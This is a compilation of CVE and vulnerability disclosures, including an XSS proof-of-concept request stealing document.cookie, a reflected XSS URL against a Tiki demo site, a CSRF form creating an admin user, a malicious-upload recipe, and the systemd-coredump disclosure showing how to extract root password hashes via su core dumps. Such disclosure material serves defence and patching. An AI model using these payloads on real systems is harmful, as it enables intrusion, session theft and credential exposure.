A vulnerability was found in NoxxieNl Criminals. It has been classified as critical. Affected is an unknown function of the file ingame/roulette.php. The manipulation of the argument gambleMoney leads to sql injection. The name of the patch is 0a60b31271d4cbf8babe4be993d2a3a1617f0897. It is recommended to apply a patch to fix this issue. VDB-218022 is the identifier assigned to this vulnerability.

CVE-2014-125076

Online Food Ordering System version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Stored Cross Site Scripting (XSS)# Date: 01/11/2023# Exploit Author: Alaeddin Berksoy# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPPPOST /fos/admin/ajax.php?action=save_category HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------212007370016574149261512413130Content-Length: 322Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/index.php?page=categoriesCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="id"-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="name"<img src onerror=alert(document.cookie);>-----------------------------212007370016574149261512413130--

Online Food Ordering System 2.0 Cross Site Scripting

Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : tiki.org                                                                   ││  Vendor   : Tiki Software Community Association                                        ││  Software : Tiki Wiki CMS Groupware 25.0                                               ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'objectId' is vulnerable to XSSPath: /25x/tiki-ajax_services.phphttps://demo.tiki.org/25x/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=%ec%98%a4%eb%8a%98%ec%9d%98%20%eb%82%a0%ec%94%a8%7d%7dfz6no%3cscript%3ealert(1)%3c%2fscript%3ewwyvb[-] Done

Tiki Wiki CMS Groupware 25.0 Cross Site Scripting

Medisense-Healthcare Solutions CRM version 2.0 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://medisensecrm.com                                                                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] infected file : /Add-User1.php .[+] save code as poc.html .<h2>Add New User</h2>    <form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">    <h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>    <h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>    <h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>    <h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">    <input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>    <input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />  </div>  </form>    </div></div>Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Medisense-Healthcare Solutions CRM 2.0 Cross Site Request Forgery

ERPGo SaaS CRM version 3.3 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : ERPGo SaaS CRM v3.3 Arbitrary File Upload Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/erpgo-saas-all-in-one-business-erp-with-project-account-hrm-crm-pos/33263426           |  | # Dork      : "ERPGo SaaS" login                                                                                                 |                "All In One Business ERP With Project, Account, HRM, CRM"                                                          |“Attention is the new currency”  The more effortless the writing looks, the more effort the writer actually put into the process.  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : https://erpgo.127.0.0.1/ERPGo/register <====| Register New account [+] Go to your membership profile and upload a malicious file instead of an image <===| https://erpgo.127.0.0.1/erpgo-saas/profile[+] Your Ev!l = https://erpgo.127.0.0.1/erpgo-saas/storage/uploads/avatar/zip_1671699428.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

ERPGo SaaS CRM 3.3 Arbitrary File Upload

A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 21 Dec 2022 12:51:24 +0100
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: systemd-coredump: CVE-2022-4415: local information leak due to
 systemd-coredump not respecting fs.suid\_dumpable kernel setting

Hello list,

this is the publication of a report that was privately shared with the
linux-distros mailing list on 2022-12-09 with a communicated coordinated
release date of 2022-12-20.

I made small changes to the report to reflect recent developments.

This report is about a security issue I found in systemd-coredump.
systemd-coredump is a userspace coredump handler for Linux that is part
of the systemd suite \[1\].

\[1\]: https://github.com/systemd/systemd

The Issue
=========

systemd-coredump sets the sysctl fs.suid\_dumpable by default to 2 via
a sysctl.d drop-in configuration file. For the kernel's builtin coredump
handling this setting means that core dumps for setuid (or otherwise
privileged) processes will be written to disk but will only be
accessible to the root user to avoid sensitive data leaking to
unprivileged user accounts. See also \`man 5 proc\` for the full
documentation of this sysctl.

systemd-coredump in userspace, however, does not respect this kernel
setting in the implementation of its coredump handling. The real user ID
of a dumping process will receive read access to the core dump via an
ACL entry:

    someuser$ cat /proc/sys/kernel/core\_pattern
    |/usr/lib/systemd/systemd-coredump %P %u %g %s %t %c %h
    someuser$ cat /cat /proc/sys/fs/suid\_dumpable
    2
    someuser$ /usr/bin/su # run a setuid-root program and keep it running
    Password:
    
    # in another shell trigger a SEGFAULT in the setuid-root program
    someuser$ kill -s SIGSEGV \`pidof su\`
    
    # back in the original shell
    Password: Segmentation fault (core dumped)
    someuser$ cd /var/lib/systemd/coredump
    someuser$ ls -l
    -rw-r-----+ 1 root root 90K Okt 20 11:59 core.su.1000.76f0e40af2a240d98e50b90ab141d974.3529.1666259998000000.zst
    someuser$ getfacl core.su.\*
    # file:
    # core.su.1000.76f0e40af2a240d98e50b90ab141d974.3529.1666259998000000.zst
    # owner: root
    # group: root
    user::rw-
    user:someuser:r--
    group::r--
    mask::r--
    other::---

I have reproduced this on openSUSE Tumbleweed with systemd version 251.
I have been able to reproduce it also on other current Linux
distributions like Arch, Debian, Fedora and SLES.

Patch and Workaround
====================

Attached are the current (two) patches I received from systemd upstream.
Upstream published the fix by now in their GitHub repository \[2\].

A simple workaround without patching systemd-coredump is to revert the
sysctl setting of fs.suid\_dumpable back to 0. In this mode the kernel
will not invoke systemd-coredump for privileged programs. The issue will
thus not be triggered.

\[2\]: https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c

Affected Versions
=================

The vulnerable default of the fs.suid\_dumpable sysctl has been present
since systemd version 246 (introduced via commit 6635f57d3ee). Even
older versions may be affected though, should a system administrator
decide to change this setting to 2.

Upstream states that only systemd starting with version 247 are
affected, I don't know how they come to this different conclusion.

Upstream also states that only builds of systemd with libacl support are
affected. This makes sense since the read access to the core dumps is
granted via ACL entries and there is no fallback to this.

Exploit and Severity
====================

Exploiting this issue is pretty simple at the outset. Regular users are
allowed to send arbitrary signals to privileged processes they create.
Thus the privileged processes can be forced to dump core at arbitrary
points in time and the memory contents of the program will become
accessible via systemd-coredump.

Whether data obtained this way allows for a relevant information leak
depends on the timing, on the one hand, and on the type of program
executed on the other hand. What comes to mind is attempting to obtain
the password hash for the root user account that is stored in
/etc/shadow. Tools like 'su' and 'sudo' will have to process these
password hashes when authenticating the invoking user.

With 'sudo' this will not work, because it actively sets the ulimit for
coredumps to 0. The reason for this is to protect against exactly this
attack scenario \[3\].

With 'su' it works, however. Attached you can find a Python script I
created that shows that it is relatively simple to obtain the root
user's hash digest from /etc/shadow. From here on an attacker can
attempt to crack the hash using a GPU rig, for example. While it is not
a simple local root exploit it can be one if there is a dedicated
attacker.

Other setuid programs (or also programs running only with certain raised
Linux capabilties) could allow for different kinds of information leaks.
Even for 'su' it depends a lot on the PAM stack configuration. Some PAM
modules might read in data from private files in the target user's home
directory, or private configuration files which could leak via
systemd-coredump.

\[3\]: https://github.com/sudo-project/sudo/blob/3040bf54c99ed1baa9e7006be2fed3d5fa71f80e/docs/sudo.man.in#L1260

Timeline
========

2022-10-20: I sent a first report and some questions to
            systemd-security@...hat.com, offering coordinated disclosure.
2022-11-28: Communication did not progress much; I investigated the issue
            further by creating a PoC. Upstream confirmed the issue now and
            acknowledged a higher severity than initially considered.
2022-12-09: The final patches have been shared with us and we agreed to
            the CRD 2022-20-20. I shared the report with the
	    linux-distros mailing list.
2022-12-12: The CVE assignment was communicated by upstream and I also
            shared it with the linux-distros mailing list.
2022-12-20: Upstream published the fix.

Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Security Engineer
https://www.suse.com/security
GPG Key ID: 0x14C405C971923553
 
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

**View attachment "**0001-coredump-adjust-whitespace.patch**" of type "**text/plain**" (5417 bytes)**

**View attachment "**0002-coredump-do-not-allow-user-to-access-coredumps-with-.patch**" of type "**text/plain**" (15695 bytes)**

**View attachment "**su\_core\_shadow\_extract.py**" of type "**text/plain**" (6337 bytes)**

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (834 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-4415: security - systemd-coredump: CVE-2022-4415: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting

A vulnerability was found in jfm-so piWallet. It has been rated as critical. Affected by this issue is some unknown functionality of the file api.php. The manipulation of the argument key leads to sql injection. The name of the patch is b420f8c4cbe7f06a34d1b05e90ee5cdfe0aa83bb. It is recommended to apply a patch to fix this issue. VDB-218006 is the identifier assigned to this vulnerability.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 316

*   Code
*   Issues 22
*   Pull requests 1
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

Permalink

Browse files

Fixed SQL Injection Issues

*   Loading branch information

Jaydon Taylor committed

Mar 26, 2017

1 parent c8adf52 commit b420f8c4cbe7f06a34d1b05e90ee5cdfe0aa83bb

Showing **1 changed file** with **1 addition** and **1 deletion**.

@@ -5,7 +5,7 @@

  

include('common.php');

$con = mysqli\_connect("$db\_host","$db\_user","$db\_pass","$db\_name");

$key = $\_GET\['key'\];

$key = mysqli\_real\_escape\_string($con, $\_GET\['key'\]);

if (mysqli\_connect\_errno()) {

echo "Failed to connect to MySQL. Make sure to edit the common.php file: " . mysqli\_connect\_error();

}

**0 comments on commit b420f8c**

Please sign in to comment.

CVE-2017-20168: Fixed SQL Injection Issues · jfm-so/piWallet@b420f8c

Lead Management System v1.0 is vulnerable to SQL Injection via the id parameter in removeCategories.php.

Submitted by mayuri\_k on Friday, December 9, 2022 - 20:05.

A lead management system is an essential tool for any company looking to generate leads. It helps the company in managing, tracking and responding to leads that are generated from different sources. This Lead management system is built on a variety of technologies such as PHP and MySQL which makes them open source. They can be found online for free. Lead management system php open source is a web-based application that helps you manage your leads and sales opportunities.

This PHP lead management system is designed to be used as a standalone application or  can integrated with other applications. It allows you to create, edit, and maintain leads, opportunities, contacts, and accounts. You can also track the status of each lead or opportunity in the database.

Lead management system is a software that helps you to manage leads and convert them into customers. It can be used in lead generation, lead qualification and lead nurturing. This project is developed in php programming language.  PHP is a server-side scripting language designed for web development, but also used as a general-purpose programming language. It was originally created by Rasmus Lerdorf in 1994, then gradually developed by the PHP Group (composed of developers from all over the world). The acronym stands for PHP: Hypertext Preprocessor. PHP is free and open source software that can be installed on most web servers. It is one of the most popular scripting languages in use on the web.

Database is developed in MySQL. The MySQL Database is an open-source relational database management system (RDBMS) that provides a set of tools for managing data which include a web-based front end, command line interface, and libraries for connecting to the server. MySQL is one of the most popular databases in use today, powering many high profile websites including many renowned plateform.

**Demo of lead management system :**

Talking about Lead management software is a type of database management tool that helps companies maintain leads. As Lead management software is one of the most important tools for any business. It helps businesses to manage their leads, keep track of them and be able to contact them easily.

The uses of lead database management software are many. Some of the most popular ones are:

\- Managing leads on a CRM system

\- Tracking the status of a lead, from first contact to signing up for a product or service

\- Contacts, phone numbers and emails for each lead

**How to Run Project :**

1.  Open your XAMPP Control Panel and start Apache and MySQL.
2.  Extract the downloaded source code zip file.
3.  Copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory.
4.  Extract the downloaded penglead zip file.
5.  Copy the extracted assets folder and paste it into the source code root path.
6.  Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin
7.  Create a new database naming penglead.
8.  Import the provided SQL file. The file is known as penglead.sql located inside the database folder.
9.  Browse the penglead in a browser. i.e. http://localhost/penglead/

**Credentials are available in notepad file included in zip**

In conclusion, lead database management software is a necessary tool for any business that relies on leads. It can help you organize your leads and convert them into customers. 

This year we have a lot of projects for final year students in computer science. I have several big projects and many other smaller projects under development. I work continuously to the improvement of my own development knowledge by learning various programming languages. **For students or anyone else who needs a program or source code for thesis writing or any Professional Software Development, Website Development, Mobile Apps Development at an affordable cost, contact me**

**My Another Version of Lead Management Software which I developed for commercial use purpose :** 

*   1049 views

CVE-2022-47864: Lead management system php open source free download

Lead Management System v1.0 is vulnerable to SQL Injection via the user_id parameter in changePassword.php.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2022-47859: CVE/sql in changePassword.php.md at main · xiumulty/CVE

Lead Management System v1.0 is vulnerable to SQL Injection via the customer_id parameter in ajax_represent.php.

Tag

#php